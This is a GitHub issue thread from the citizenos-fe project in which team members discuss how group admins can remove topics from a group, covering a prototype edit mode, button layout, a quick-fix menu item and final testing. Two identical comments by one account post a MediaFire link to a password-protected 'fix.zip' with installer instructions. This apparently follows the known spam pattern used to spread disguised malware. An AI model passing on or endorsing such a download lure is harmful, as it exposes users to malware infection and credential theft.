### ISSUE TITLE
GROUPS: Enable removal of topics from a group (quick fix first, then big fix)

### ISSUE THREAD

**Issue by BeccaMelhuish** [citizenos/citizenos-fe#1529]
A spin-off issue from [this now closed issue](https://github.com/citizenos/citizenos-fe/issues/186). As discussed, we need to provide a way for group admins to remove topic from a group

Copying the conversation over to here: 

**From @kevincrepin:** 

_Was thinking about this missed functionality of removing topics from groups and maybe this could be a solution.
https://www.figma.com/proto/gOJ4i00538e0qaP6IKIPVE/Platform-2.0-UI?page-id=3094%3A111670&type=design&node-id=12468-106573&viewport=-15119%2C-16136%2C0.5&t=4Ly7iTmY3x9xE8m8-1&scaling=scale-down&starting-point-node-id=12468%3A106573&show-proto-sidebar=1&mode=design_

_We have a button "manage topics" next to the add/create topic which allows the admin to remove all topics in one go or go into a sort of "edit mode" which will reveal a remove button per topic. I mainly didn't want to have a repeating remove button on each topic, but if this idea is too vague or does not make sense then I think that would probably be the next suggestion.
My concern is that it might be very clear how to get out of this "edit mode" again..._

_However this idea does come with an opportunity to do it similarly for members: you can click on the Members tab to see the update. So instead of the bulk actions in the bottom left as we have it now, there would also be a "manage members" option here which would open the same menu as we have now for the bulk actions. But it would be consistent with the management of the topics then._

![image](https://github.com/user-attachments/assets/93a56315-7c02-40b3-92be-ca3a5cd122ac)

![image](https://github.com/user-attachments/assets/bed00421-72dc-4c80-ab16-273fc94db6d6)

**From @ilmartyrk:** 

_@kevincrepin I like the solution, though my concern is that with 2 buttons side by side we need another design at around 600px screen width. As currently there isn't enough space there for 2 buttons_

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BeccaMelhuish** [comment]
@kevincrepin Some thoughts from me on this: 

It did take me a bit of time to try to guess what 'Enable select to remove' meant, but once I'd clicked on it, was pretty clear. 

Re the problem of how to get out of this mode, my instinct was to click elsewhere in the topic to revert back to 'normal' mode, which I guess should be quite intuitive for most users? I think with the combination of this option and the menu it should be OK.  

I wonder if a little 'Cancel' under each might also help? 
![image](https://github.com/user-attachments/assets/511756c0-5b56-4ef0-836a-dbdcc3a1848e)

I'd probably want to user test this in the 'test' environment before it went live though - to make sure people understand it, and also that the added menu doesn't cause any other areas of confusion. 

As a quick fix (as we have no testing rounds planned currently), I'm wondering if we could just add 'Remove from group' as an additional item in the manage topic menu, which only appears when the topic is part of at least one group? And then a pop-up that lets them select which one. 

![image](https://github.com/user-attachments/assets/30009ee7-f4c3-4735-b9eb-fe4e765b34f4)

**Comment by BeccaMelhuish** [comment]
I've add the 'UX test pre-live' button, but that's only for the 'Manage' topics button. For the quick fix 'Remove from group' in the menu we could make it live already.

**Comment by BeccaMelhuish** [comment]
@ilmartyrk I checked and it seems to work well technically, but UX wise I think we need at minimum for it to work that if you click anywhere (both further up or next to the cards) that isn't one of the topic cards (or another active area - buttons etc) then it takes you out of the 'remove' mode. As Kevin mentioned it seems pretty unlikely people will easily find the 'Disable select to remove' in the menu (and especially now that it's no longer 'Enable select to remove' when you first click it, though the new text seems clearer so that's good).  

![image](https://github.com/user-attachments/assets/c2d9e41d-7701-4061-909d-b7005be06e0d)

As mentioned previously I also feel a little 'Cancel' under each remove button could be helpful too, but we'd need @kevincrepin's input on that :)  

![image](https://github.com/user-attachments/assets/4903869d-a113-47dd-a933-42a8e05ef9b1)

**Comment by BeccaMelhuish** [comment]
OK nice, have checked it and I think this can be moved to Done now, but will leave for @ssin1901 to test further if needed :)  

(Just one thing to note re the UX: I notice that you come out of the 'delete' mode after deleting just one topic - which wasn't how I'd imagined it working, and think this wasn't how @kevincrepin intended it (wasn't the case in the prototype). But for me that works OK, as it's likely admins only want to delete one topic at a time (I assume), and this will avoid them getting 'stuck' in the delete mode.)

**Comment by ssin1901** [comment]
Tested and works fine. Moving to Done.
